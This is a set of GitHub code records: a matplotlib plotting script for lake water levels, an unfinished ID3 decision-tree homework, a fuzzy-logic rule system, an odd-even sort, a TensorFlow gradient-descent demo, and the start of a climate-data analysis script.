(Sentinel A)\",\n fontsize=TITLE_SIZE,\n color=TEXT_COLOUR,\n pad=20\n)\nlocator = matplotlib.dates.MonthLocator((1, 7))\nfmt = matplotlib.dates.DateFormatter('%b-%Y')\nax.xaxis.set_major_locator(locator)\nax.xaxis.set_major_formatter(fmt)\nfor x in ax.get_xticklabels():\n x.set_rotation(45)\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(TEXT_COLOUR)\n\nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(TEXT_COLOUR)\n\n# Set the colour of the axes\nax.spines[\"top\"].set_color(TEXT_COLOUR)\nax.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax.spines[\"left\"].set_color(TEXT_COLOUR)\nax.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nplt.tight_layout()\nfig.savefig(\n './out/median.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n#####\n##### Figure 4: Kalman filtered lake water levels; overlaid on median (figure 3) levels\n#####\n# Just read in the results; don't repeat processing here.\nkalman_filtered = pd.read_csv(\"./processed/sentinel_a_lake_winnipeg_kalman_filtered.csv\")\n\n# Plot just the median\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nax.plot(\n baseline_results[\"date_as_datetime\"],\n baseline_results[\"lake_water_level\"],\n linewidth=1.0,\n label=\"Median of each track\",\n alpha=0.5,\n color = \"#F55536\"\n)\nax.plot(\n pd.to_datetime(kalman_filtered[\"date\"], format=\"%Y%m%d\"),\n kalman_filtered[\"kalman_filtered_lake_water_levels\"],\n zorder=10,\n label=\"Kalman Filtered\",\n alpha=0.85,\n color=\"#6BAB90\"\n)\nax.set_xlabel(\n 'Date',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE,\n)\nax.set_ylabel(\n 'Lake Winnipeg water levels (m)',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE\n)\nplt.title(\n \"Median and Kalman filtered lake water levels on each day\\nin Lake Winnipeg (Sentinel A)\",\n fontsize=TITLE_SIZE,\n color=TEXT_COLOUR,\n pad=20\n)\nlocator = matplotlib.dates.MonthLocator((1, 7))\nfmt = matplotlib.dates.DateFormatter('%b-%Y')\nax.xaxis.set_major_locator(locator)\nax.xaxis.set_major_formatter(fmt)\nfor x in ax.get_xticklabels():\n x.set_rotation(45)\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(TEXT_COLOUR)\n\nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(TEXT_COLOUR)\n\nax.legend(\n)\n# Set the colour of the axes\nax.spines[\"top\"].set_color(TEXT_COLOUR)\nax.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax.spines[\"left\"].set_color(TEXT_COLOUR)\nax.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nplt.tight_layout()\nfig.savefig(\n './out/kalman.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n####\n#### Figure 5: Neural network lake water levels\n####\n# Read in the data used to make the neural network figure\nlake_winnipeg_nn = pd.read_csv(\"./processed/sentinel_a_b_lake_winnipeg_neural_network.csv\")\nfig = plt.figure(\n figsize=(6, 6)\n)\nax = fig.add_subplot(111)\n# Artificially split the time series into a train/test part\n# Plot in-situ\nax.plot(\n pd.to_datetime(lake_winnipeg_nn[\"date\"], format=\"%Y-%m-%d\"),\n lake_winnipeg_nn[\"in_situ_lake_water_level\"],\n color=\"#16E0BD\",\n linestyle=\"-.\",\n linewidth=1.0,\n label=\"In-situ lake water levels\",\n alpha=0.9\n)\n\n# Plot median of lake water levels\nax.plot(\n pd.to_datetime(lake_winnipeg_nn[\"date\"], format=\"%Y-%m-%d\"),\n lake_winnipeg_nn[\"lake_water_level\"],\n linestyle=\"-\",\n 
linewidth=1.0,\n color=\"#F55536\",\n alpha=0.5,\n label=\"Sentinel A/B lake water levels (median)\"\n)\n\n\nax.plot(\n pd.to_datetime(lake_winnipeg_nn[\"date\"], format=\"%Y-%m-%d\"),\n lake_winnipeg_nn[\"lake_water_levels_nn\"], \n color=\"#586A6A\", # Deep space sparkle\n linestyle=\"--\",\n linewidth=1.0,\n alpha=0.9,\n label=\"Neural Network\"\n)\n\nlocator = matplotlib.dates.MonthLocator((1, 7))\nfmt = matplotlib.dates.DateFormatter('%b-%Y')\nax.xaxis.set_major_locator(locator)\nax.xaxis.set_major_formatter(fmt)\nfor x in ax.get_xticklabels():\n x.set_rotation(45)\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(\"w\")\n \nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(\"w\")\nax.legend()\nax.set_xlabel(\n \"Date\",\n labelpad=20,\n fontsize=LABEL_SIZE,\n color=TEXT_COLOUR\n)\nax.set_ylabel(\n \"Lake Water Level (m)\",\n labelpad=20,\n fontsize=LABEL_SIZE,\n color=TEXT_COLOUR\n)\nax.spines[\"top\"].set_color(TEXT_COLOUR)\nax.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax.spines[\"left\"].set_color(TEXT_COLOUR)\nax.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nplt.title(\n \"Lake Winnipeg water levels: in-situ, median,\\n and neural network\",\n pad=20,\n fontsize=TITLE_SIZE,\n color=TEXT_COLOUR\n)\nplt.tight_layout()\nfig.savefig(\n './out/neural_network.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)","repo_name":"pvasudev16/ml-freshwater-management","sub_path":"figures_for_presentation.py","file_name":"figures_for_presentation.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11526708665","text":"import math\nimport numpy as np\nfrom collections import Counter\n# Note: please don't add any new package, you should solve this problem using only the packages above.\n# However, importing the Python standard library is allowed: https://docs.python.org/3/library/\n#-------------------------------------------------------------------------\n'''\n Part 1: Decision Tree (with Discrete Attributes) -- 60 points --\n In this problem, you will implement the decision tree method for classification problems.\n You could test the correctness of your code by typing `nosetests -v test1.py` in the terminal.\n'''\n \n#-----------------------------------------------\nclass Node:\n '''\n Decision Tree Node (with discrete attributes)\n Inputs: \n X: the data instances in the node, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n i: the index of the attribute being tested in the node, an integer scalar \n C: the dictionary of attribute values and children nodes. \n Each (key, value) pair represents an attribute value and its corresponding child node.\n isleaf: whether or not this node is a leaf node, a boolean scalar\n p: the label to be predicted on the node (i.e., most common label in the node).\n '''\n def __init__(self,X,Y, i=None,C=None, isleaf= False,p=None):\n self.X = X\n self.Y = Y\n self.i = i\n self.C= C\n self.isleaf = isleaf\n self.p = p\n\n#-----------------------------------------------\nclass Tree(object):\n '''\n Decision Tree (with discrete attributes). \n We are using ID3(Iterative Dichotomiser 3) algorithm. 
So this decision tree is also called ID3.\n '''\n #--------------------------\n @staticmethod\n def entropy(Y):\n '''\n Compute the entropy of a list of values.\n Input:\n Y: a list of values, a numpy array of int/float/string values.\n Output:\n e: the entropy of the list of values, a float scalar\n Hint: you could use collections.Counter.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n c=Counter(Y)\n total=len(Y)\n sumEntropy=0\n for key in c.keys():\n val=c.get(key)\n sumEntropy-=val/total*math.log2(val/total)\n e=sumEntropy\n #########################################\n return e \n \n \n \n #--------------------------\n @staticmethod\n def conditional_entropy(Y,X):\n '''\n Compute the conditional entropy of y given x. The conditional entropy H(Y|X) means average entropy of children nodes, given attribute X. Refer to \n\n Input:\n X: a list of values , a numpy array of int/float/string values. The size of the array means the number of instances/examples. X contains each instance's attribute value. \n Y: a list of values, a numpy array of int/float/string values. Y contains each instance's corresponding target label. For example X[0]'s target label is Y[0]\n Output:\n ce: the conditional entropy of y given x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n cX=Counter(X)\n xY=Counter(Y)\n keyBlackList=[]\n sumEntropy=0\n for i in range(len(Y)):\n #Finds a key that isnt already accounted for\n key=X[i]\n if key in keyBlackList:\n continue\n keyBlackList.append(key)\n labelList=[]\n #Finds all other occurences of the key\n for j in range(len(Y)):\n if(X[j]==key):\n labelList.append(Y[j])\n #Reduces Entropy by fraction of the sample in that split\n sumEntropy+=Tree.entropy(labelList)*len(labelList)/len(Y)\n ce=sumEntropy\n\n\n\n \n\n\n\n \n #########################################\n return ce \n \n \n \n #--------------------------\n @staticmethod\n def information_gain(Y,X):\n '''\n Compute the information gain of y after spliting over attribute x\n InfoGain(Y,X) = H(Y) - H(Y|X) \n Input:\n X: a list of values, a numpy array of int/float/string values.\n Y: a list of values, a numpy array of int/float/string values.\n Output:\n g: the information gain of y after spliting over x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n HY=Tree.entropy(Y)\n HYX=Tree.conditional_entropy(Y,X)\n g=HY-HYX\n\n\n \n #########################################\n return g\n\n\n #--------------------------\n @staticmethod\n def best_attribute(X,Y):\n '''\n Find the best attribute to split the node. \n Here we use information gain to evaluate the attributes. \n If there is a tie in the best attributes, select the one with the smallest index.\n Input:\n X: the feature matrix, a numpy matrix of shape p by n. \n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n. 
Each element can be int/float/string.\n Output:\n i: the index of the attribute to split, an integer scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n besti=None\n bestGain=-math.inf\n for i in range(len(X)):\n attList=[]\n for j in range(len(X[0])):\n attList.append(X[i][j])\n g=Tree.information_gain(Y,attList)\n if(g>bestGain):\n besti=i\n bestGain=g\n\n \n\n \n #########################################\n return besti\n\n \n #--------------------------\n @staticmethod\n def split(X,Y,i):\n '''\n Split the node based upon the i-th attribute.\n (1) split the matrix X based upon the values in i-th attribute\n (2) split the labels Y based upon the values in i-th attribute\n (3) build children nodes by assigning a submatrix of X and Y to each node\n (4) build the dictionary to combine each value in the i-th attribute with a child node.\n \n Input:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n i: the index of the attribute to split, an integer scalar\n Output:\n C: the dictionary of attribute values and children nodes. \n Each (key, value) pair represents an attribute value and its corresponding child node.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n \n attList=[]\n xList={}\n yList={}\n for j in range(len(X[0])):\n att=X[i][j]\n if (att in attList):\n #Add to list if list already has index\n xList.get(att).append(X[:,j])\n yList.get(att).append(Y[j])\n continue\n attList.append(att)\n xList[att]=[X[:,j]]\n yList[att]=[Y[j]]\n xList[att]=np.array(xList[att])\n yList[att]=np.array(yList[att])\n childList={}\n for key in attList:\n childX=np.transpose(xList[key])\n childY=np.transpose(yList[key])\n child=Node(childX, childY)\n childList[key]=child\n \n #########################################\n return childList\n\n #--------------------------\n @staticmethod\n def stop1(Y):\n '''\n Test condition 1 (stop splitting): whether or not all the instances have the same label. \n \n Input:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Output:\n s: whether or not Conidtion 1 holds, a boolean scalar. \n True if all labels are the same. Otherwise, false.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n s=True\n #Returns false if any dont match the first item in list\n for i in range(len(Y)):\n if(Y[i]==Y[0]):\n continue\n return False\n\n\n\n \n #########################################\n return s\n \n #--------------------------\n @staticmethod\n def stop2(X):\n '''\n Test condition 2 (stop splitting): whether or not all the instances have the same attribute values. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the node, p is the number of attributes.\n Output:\n s: whether or not Conidtion 2 holds, a boolean scalar. 
\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n s=True #Return True Otherwise\n\n #Return false if something doesnt match \n for i in range(len(X)):\n for j in range(len(X[0])):\n if(X[i][j]!=X[i][0]):\n return False\n\n\n \n #########################################\n return s\n \n \n #--------------------------\n @staticmethod\n def most_common(Y):\n '''\n Get the most-common label from the list Y. \n Input:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Here n is the number data instances in the node.\n Output:\n y: the most common label, a scalar, can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n c=Counter(Y)\n y=(c.most_common(1))[0][0]\n \n #########################################\n return y\n \n \n \n #--------------------------\n @staticmethod\n def build_tree(t):\n '''\n Recursively build tree nodes.\n Input:\n t: a node of the decision tree, without the subtree built.\n t.X: the feature matrix, a numpy float matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances, p is the number of attributes.\n t.Y: the class labels of the instances in the node, a numpy array of length n.\n t.C: the dictionary of attribute values and children nodes. \n Each (key, value) pair represents an attribute value and its corresponding child node.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n for i in range (1000): #Replace with while true once termination no longer concern\n if(Tree.stop1(t.Y)): #If tree is Homogenous prediction Label, Stop and make Leaf\n t.isLeaf=True\n t.p=Tree.most_common(t.Y)\n return t\n elif(Tree.stop2(t.X)):#If tree is Homogenous attributes, Stop and make Leaf\n t.isLeaf=True\n t.p=Tree.most_common(t.Y)\n return t\n else: # Else Split on Best Attribute, and recurse (I believe this is where the error is)\n attSplit=Tree.best_attribute(t.X, t.Y)\n child=Tree.split(t.X, t.Y, attSplit)\n child.i=attSplit\n t.C=child\n return Tree.build_tree(t)\n\n \n\n\n \n #########################################\n \n \n #--------------------------\n @staticmethod\n def train(X, Y):\n '''\n Given a training set, train a decision tree. \n Input:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the training set, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n Output:\n t: the root of the tree.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n \n\n\n \n #########################################\n return t\n \n \n \n #--------------------------\n @staticmethod\n def inference(t,x):\n '''\n Given a decision tree and one data instance, infer the label of the instance recursively. \n Input:\n t: the root of the tree.\n x: the attribute vector, a numpy vectr of shape p.\n Each attribute value can be int/float/string.\n Output:\n y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n \n\n\n\n\n \n #########################################\n return y\n \n #--------------------------\n @staticmethod\n def predict(t,X):\n '''\n Given a decision tree and a dataset, predict the labels on the dataset. 
\n Input:\n t: the root of the tree.\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the dataset, p is the number of attributes.\n Output:\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n\n\n\n #########################################\n return Y\n\n\n\n #--------------------------\n @staticmethod\n def load_dataset(filename = 'data1.csv'):\n '''\n Load dataset 1 from the CSV file: 'data1.csv'. \n The first row of the file is the header (including the names of the attributes)\n In the remaining rows, each row represents one data instance.\n The first column of the file is the label to be predicted.\n In remaining columns, each column represents an attribute.\n Input:\n filename: the filename of the dataset, a string.\n Output:\n X: the feature matrix, a numpy matrix of shape p by n.\n Each element can be int/float/string.\n Here n is the number data instances in the dataset, p is the number of attributes.\n Y: the class labels, a numpy array of length n.\n Each element can be int/float/string.\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n\n \n #########################################\n return X,Y\n\n\n\n","repo_name":"link101011/CS539","sub_path":"part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":15773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31871455829","text":"import numpy as np\nimport skfuzzy as fuzz\nfrom skfuzzy import control as ctrl\nfrom Fuzzy_System import Read_Data\nimport re\nimport logging\n\n\ndef build_fuzzy_universe(fuzzy_sets, consequent):\n universe_variables = {}\n # create custom membership functions for variable, for each of its statuses.\n for variable_name, variable_statuses in fuzzy_sets.items():\n try:\n # find range of statuses values for each variable - aka their smallest and highest value\n smallest, largest = find_minmax_values(variable_statuses)\n # now create the ctrl universe variable using the aforementioned range\n if variable_name.lower() == consequent.lower():\n # the +1 is currently a mystery - doesn't work properly without it\n # if you add \"bisector\" or \"lom\" etc to ctrl.consequent you can get the other results\n # todo for later perhaps?\n universe_variables[variable_name] = ctrl.Consequent(np.arange(smallest, largest + 1), variable_name)\n else:\n universe_variables[variable_name] = ctrl.Antecedent(np.arange(smallest, largest + 1), variable_name)\n # adding each of the statuses and their values to the universe variables\n for status in variable_statuses:\n status_name = status[0]\n status_values = status[1]\n universe_variables[variable_name][status_name] = fuzz.trapmf(universe_variables[variable_name].universe,\n status_values)\n except Exception as e:\n logging.error(e)\n return universe_variables\n\n\ndef find_minmax_values(variable_statuses):\n small_values = []\n large_values = []\n for variable_status in variable_statuses:\n try:\n # take the smallest/largest value for each status\n small_values.append(min(variable_status[1]))\n large_values.append(max(variable_status[1]))\n except Exception as e:\n logging.error(e)\n # then take the smallest/largest value among all statuses\n smallest = min(small_values)\n largest = max(large_values)\n return smallest, largest\n\n\ndef build_fuzzy_rules(rules, 
variables):\n args = 1\n ctrl_rules = []\n for rule in rules:\n try:\n rule_split = rule.split(\"then\")\n antecedents = dict(re.findall('(\\w+)\\s*is\\s*[not]* (\\w+)', rule_split[0]))\n consequents = re.findall('(\\w+)\\s*is\\s*[not]* (\\w+)', rule_split[1])\n words_in_rule = rule_split[0].split(\" \")\n # loops through the antecedent part of the rule. If it finds and/or,\n # it grabs the next word as the antecedent and adds it to the rules\n # if it finds `not', it appends it to the rule\n for i in range(3, len(words_in_rule)):\n try:\n if words_in_rule[i - 3] == \"if\":\n args = variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n elif words_in_rule[i - 3] == \"and\":\n if words_in_rule[i] == \"not\":\n args = args & ~ variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n else:\n args = args & variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n elif words_in_rule[i - 3] == \"or\":\n if words_in_rule[i] == \"not\":\n args = args | ~ variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n else:\n args = args | variables[words_in_rule[i - 2]][antecedents[words_in_rule[i - 2]]]\n except KeyError as e:\n logging.error(\"Could not recognise antecedent variable: {}. \"\n \"Make sure each variable is only one word.\".format(words_in_rule[i]))\n # couldn't get consequent to handle not :(\n consequent = variables[consequents[0][0]][consequents[0][1]]\n ctrl_rules.append(ctrl.Rule(args, consequent))\n except Exception as e:\n logging.error(e)\n return ctrl_rules\n\n\ndef defuzzify(rules, measurements):\n rule_ctrl = ctrl.ControlSystem(rules)\n rulebase = ctrl.ControlSystemSimulation(rule_ctrl)\n for variable, value in measurements.items():\n try:\n rulebase.input[variable] = value\n except Exception as e:\n logging.error(e)\n try:\n rulebase.compute()\n except Exception as e:\n logging.error(e)\n exit()\n return rulebase\n\n\ndef is_data_valid(fuzzy_sets, rules, measurements):\n if len(fuzzy_sets) == 0:\n logging.error(\"Couldn't find any valid fuzzy sets!\")\n return False\n if len(rules) == 0:\n logging.error(\"Couldn't find any valid rules!\")\n return False\n if len(measurements) == 0:\n logging.error(\"Couldn't find any valid measurements!\")\n return False\n if len(fuzzy_sets) <= len(measurements):\n logging.warning(\n \"ERROR: Not enough fuzzy sets have been added in the input, or too many measurements have been included. \"\n \"Make sure a fuzzy set is present for each variable, including consequent variables.\")\n return False\n else:\n return True\n\n\ndef main():\n # first, read the main file and separate the sections\n input_txt = Read_Data.read_input_txt(\"rules_and_data\")\n # input_txt will return false if any of the 3 mandatory headers are missing\n if not input_txt:\n logging.warning(\"Exiting...\")\n exit(1)\n\n # then, format the sections according to need\n fuzzy_sets = Read_Data.format_fuzzy_sets(input_txt[\"fuzzysets\"]) # dict of dicts\n rules = Read_Data.format_rules(input_txt[\"rulebase\"]) # dict\n measurements = Read_Data.format_measurements(input_txt[\"measurements\"]) # dict\n\n if not is_data_valid(fuzzy_sets, rules, measurements):\n logging.warning(\"The input data is not valid. Please check the message above for more details. 
Exiting...\")\n exit(1)\n\n # we build a different fuzzy universe for each rule base (in case there are multiple given)!\n for rulebase_pair, rules_values in rules.items():\n consequent = rulebase_pair[1]\n rulebase_name = rulebase_pair[0]\n universe_variables = build_fuzzy_universe(fuzzy_sets, consequent)\n fuzzy_rules = build_fuzzy_rules(rules_values, universe_variables)\n # once the rules and universe variables have been created, defuzzify rule base unknown value\n calculated_rulebase = defuzzify(fuzzy_rules, measurements)\n print(\"The defuzzified suggested value of \" + consequent + \" for the \" + rulebase_name + \" is:\")\n print(calculated_rulebase.output[consequent])\n universe_variables[consequent].view(sim=calculated_rulebase)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VahalaSly/Fuzzy_System","sub_path":"Defuzzify.py","file_name":"Defuzzify.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17875382969","text":"import random\r\nfrom Swap.Swap import swap\r\nimport timeit\r\n\r\n#push for github from windows console\r\n\r\n\"\"\"Decorator to be able tu mesure the time of execution\"\"\"\r\ndef wrapper(func, *args, **kwargs):\r\n def wrapped():\r\n return func(*args, **kwargs)\r\n return wrapped\r\n\r\n\r\ndef pair_impair(arr):\r\n for i in range(1, len(arr)-1):\r\n #paire impaire\r\n for j in range(0, len(arr)-1, 2):\r\n if arr[j] >= arr[j+1]:\r\n arr[j], arr[j+1] = swap(arr[j], arr[j+1])\r\n #impaire paire\r\n for j in range(1, len(arr)-1, 2):\r\n if arr[j] >= arr[j+1]:\r\n arr[j], arr[j+1] = swap(arr[j], arr[j+1])\r\n return arr\r\n\r\n\r\nprint(\"\\n###############\\tPaire Impaire Sort\\t################\\n\")\r\narr = [random.randint(0, 100) for x in range(100)]\r\nprint(\"Before sort :\", arr)\r\nprint(\"After sort :\", pair_impair(arr))\r\n\r\n\"\"\"Time of execution\"\"\"\r\nwrapped = wrapper(pair_impair, arr)\r\nprint(\"Time of execution : \", timeit.timeit(wrapped, number=1), \"s\")\r\n","repo_name":"Somonntc/Sort","sub_path":"Tri/pair_impair.py","file_name":"pair_impair.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3528241238","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom ex1_cost_function import *\n#from ex2_derivative_function import *\nfrom ex3_update_value import *\nimport time\nimport tensorflow as tf\n\ndef main():\n\t# Draw cost function\n\tx = np.arange(-10, 15, 0.1)\n\ty = [cost_function(i) for i in x]\n\tplt.plot(x, y)\n\tplt.ylabel('Cost Value')\n\tplt.xlabel('Input Variable')\n\tplt.title('Click on the figure to run Gradient Descent Algorithm')\n\tplt.waitforbuttonpress()\n\n\t# Run gradient descent\n\tl_rate = 0.01\n\tx = tf.Variable(-10, dtype = tf.float32)\n\tcost = 3*x**2 - 12*x + 4\n\ttrain = tf.train.GradientDescentOptimizer(l_rate).minimize(cost)\n\tinit = tf.global_variables_initializer()\n\tsess = tf.Session()\n\tsess.run(init)\n\tfor i in range(100):\n\t\tsess.run(train)\n\t\tx_op = sess.run(x)\n\t\tplt.plot(x_op, cost_function(x_op), 'r+')\n\t\tplt.pause(0.1)\n\n\tprint('Optimized variable: x_op = ', x_op)\n\tprint('Optimized value: f(x_op)=', cost_function(x_op))\t\n\nif __name__ == 
'__main__':\n\tmain()\n","repo_name":"thanhhff/VietAI-Foundation-Doc","sub_path":"lec_04/Tutorial4-GradientDescent/main_tf.py","file_name":"main_tf.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"12387239756","text":"import matplotlib\nmatplotlib.use('Agg')\nimport numpy as np\nimport pandas as pd\nimport iris\nfrom ascend import shape\nfrom glob import glob as glob\nimport os\nimport argparse\n\nfrom esmvaltool.diagnostics import plotting\n# works in SCITOOLS Default/next (2021-03-18)\n\nPLOT_PATH = \"/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/plots\"\nDATA_PATH = \"/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/plot_data\"\n\ndef mask_wp2_atlas_data(cube, shp):\n # mask wp2 data using shape file\n\n # approach varies depending on if cube is downloaded from WP2 atlas\n # or direct from Glen's folders\n if cube.ndim == 4:\n # first get lat / lon mask over 2 dimensions\n xy_mask = np.logical_not(shp.cube_intersection_mask(cube[0,:,:,0]))\n # broadcast to 3d\n xyp_mask = np.broadcast_to(xy_mask[:,:,np.newaxis], cube.shape[1:])\n # broadcast to 4d\n cube_mask = np.broadcast_to(xyp_mask, cube.shape)\n else:\n # 3 dimensional (lat, lon, percentile)\n # get 2d mask\n xy_mask = np.logical_not(shp.cube_intersection_mask(cube[:,:,0]))\n # broadcast to 3d\n cube_mask = np.broadcast_to(xy_mask[:,:,np.newaxis], cube.shape)\n\n # apply to cube\n # combine with existing mask\n cube_mask = np.logical_or(cube_mask, cube.data.mask)\n cube.data.mask = cube_mask\n\n return cube\n\n\ndef load_wp2_atlas(method, var, area, season):\n # load netCDF file\n base_path = \"/net/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/weighting_data/WP2_atlas\"\n\n # define region constraint if lat and lon supplied\n if type(area) == list:\n region = iris.Constraint(\n longitude=lambda x: area[0] <= x <= area[1],\n latitude=lambda x: area[2] <= x <= area[3]\n )\n\n bxp_obs = []\n for data in [\"cons\", \"uncons\"]:\n # do not load uncons data for CALL or ASK methods\n if data == \"uncons\":\n if any(m in method for m in [\"ASK\", \"CALL\"]):\n continue\n\n fname = f\"{base_path}/atlas_EUCP_{method}_{data}_{var}.nc\"\n cube = iris.load_cube(fname)\n\n # extract shape / region\n if type(area) == list:\n cube = cube.extract(region)\n else:\n cube = mask_wp2_atlas_data(cube, area)\n\n if season == \"JJA\":\n # use first time point (JJA)\n cube = cube[0]\n elif season == \"DJF\":\n cube = cube[1]\n else:\n raise ValueError(\"Only JJA and DJF available.\")\n\n # area average\n cube.coord(\"latitude\").units = \"degrees\"\n cube.coord(\"latitude\").guess_bounds()\n cube.coord(\"longitude\").units = \"degrees\"\n cube.coord(\"longitude\").guess_bounds()\n grid_areas = iris.analysis.cartography.area_weights(cube)\n cube_mean = cube.collapsed([\"latitude\", \"longitude\"], iris.analysis.MEAN, weights=grid_areas)\n\n # create boxplot stats object\n if data == \"cons\":\n label = method\n else:\n label = None\n\n bxp_stats = {\n \"whislo\": cube_mean.extract(iris.Constraint(percentile=10)).data.item(),\n \"q1\": cube_mean.extract(iris.Constraint(percentile=25)).data.item(),\n \"med\": cube_mean.extract(iris.Constraint(percentile=50)).data.item(),\n \"q3\": cube_mean.extract(iris.Constraint(percentile=75)).data.item(),\n \"whishi\": cube_mean.extract(iris.Constraint(percentile=90)).data.item(),\n \"label\": label\n }\n\n bxp_obs.append(bxp_stats)\n\n return bxp_obs\n\n\ndef load_wp2_glen(var, area, 
season):\n # Load WP2 constraint data from files in Glen's user space.\n # define constraint if using a rectangle\n if type(area) == list:\n region = iris.Constraint(\n longitude=lambda x: area[0] <= x <= area[1],\n latitude=lambda x: area[2] <= x <= area[3]\n )\n\n results = []\n season = season.lower()\n for d_type in [\"all\", \"prior\"]:\n file_name = f\"/data/users/hadgh/eucp/data/v13/d23map/{var}Anom/{season}/{var}Anom_rcp85_eu_300km_W{d_type}-N600000-P21_cdf_b9514_20y_{season}_20401201-20601130.nc\"\n\n cube = iris.load_cube(file_name)\n\n # extract shape / region\n if type(area) == list:\n cube = cube.extract(region)\n else:\n cube = mask_wp2_atlas_data(cube, area)\n\n grid_areas = iris.analysis.cartography.area_weights(cube)\n cube_mean = cube.collapsed([\"latitude\", \"longitude\"], iris.analysis.MEAN, weights=grid_areas)\n\n # create boxplot stats object\n if d_type == \"all\":\n label = \"UKCP constraint\"\n else:\n label = None\n\n bxp_stats = {\n \"whislo\": cube_mean.extract(iris.Constraint(percentile=10)).data.item(),\n \"q1\": cube_mean.extract(iris.Constraint(percentile=25)).data.item(),\n \"med\": cube_mean.extract(iris.Constraint(percentile=50)).data.item(),\n \"q3\": cube_mean.extract(iris.Constraint(percentile=75)).data.item(),\n \"whishi\": cube_mean.extract(iris.Constraint(percentile=90)).data.item(),\n \"label\": label\n }\n\n results.append(bxp_stats)\n\n return results\n\n\ndef load_esmval_gridded_data(recipe, var, proj, area, season, use_lsm=True):\n # load gridded anomaly data that has been produced by the ESMValTool recipe\n # recipe: name of recipe run that contains data, e.g. recipe_GCM_and_RCM_pan_EU_20211214_170431\n # variable: tas or pr\n # proj: type of data to load, e.g. cmip5, cmip6, cordex, cpm, UKCP18 land-gcm, UKCP18 land-rcm\n # area: area to compute area averages for. As a shape file for now..\n # season: season to load data for, djf, mam, jja or son\n # use_lsm: apply Land sea mask to mask out ocean\n # return an array of the computed area means for each data file (model) found\n\n # first get path to where all the files will be\n season = season.upper()\n input_path = f\"/net/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/esmvaltool_output/{recipe}/work/{var}_anoms/main/{season}/\"\n\n if use_lsm:\n # setup land mask shape\n lsm = shape.load_shp(\n 